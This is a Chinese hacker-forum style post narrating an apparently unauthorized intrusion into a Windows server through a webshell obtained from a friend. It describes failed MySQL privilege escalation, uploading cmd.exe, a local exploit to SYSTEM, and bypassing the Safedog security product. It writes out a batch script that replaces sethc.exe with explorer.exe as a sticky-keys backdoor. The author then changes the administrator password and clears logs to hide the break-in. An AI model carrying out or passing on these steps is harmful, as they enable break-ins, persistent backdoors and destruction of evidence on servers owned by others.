服务器安全狗提权放sethc后门

服务器安全狗提权放sethc后门（精选1篇）

篇1：服务器安全狗提权放sethc后门

By：永恒

Qq：97245325

今天一位法客论坛的朋友给我一个shell，

说要mysql提权。版本是MYSQL版本:5.1.57-

5.0以上的要在mysql目录里才可执行。

可f:/ZkeysSoft/MySql/MySQLServer5.1/lib/plugin/不能创建目录。所以mysql的提权方法不能成功。或许有些大牛可以。

打开shell

组建是支持的。说明有希望。

不支持。Aspx那没关系

上传cmd到F:RECYCLERcmd.exe

可以执行。那就溢出看看吧。

本人喜欢用iis6

看到是system的权限。

好吧添加账户看看。

发现添加不成功、

难道是什么东东格挡了?

可以看出是安全狗，

安全狗啊。网上都有教程的。那就用sethc.exe来做后门吧。

@echooff

del/q%systemroot%system32dllcachesethc.exe

del/q%systemroot%system32sethc.exe

copy%systemroot%explorer.exe%systemroot%system32sethc.exe

copy%systemroot%explorer.exe%systemroot%system32dllcachesethc.exe

保持为1.bat

执行成功。

连接看看。

然后想登陆桌面却不行。用guest要加到administrators组老是不行。

哥生气了。后果很严重。果断把administator管理员密码改了。

成功进入。服务器鸡八卡。清除后门。清除日记。然后走人。

​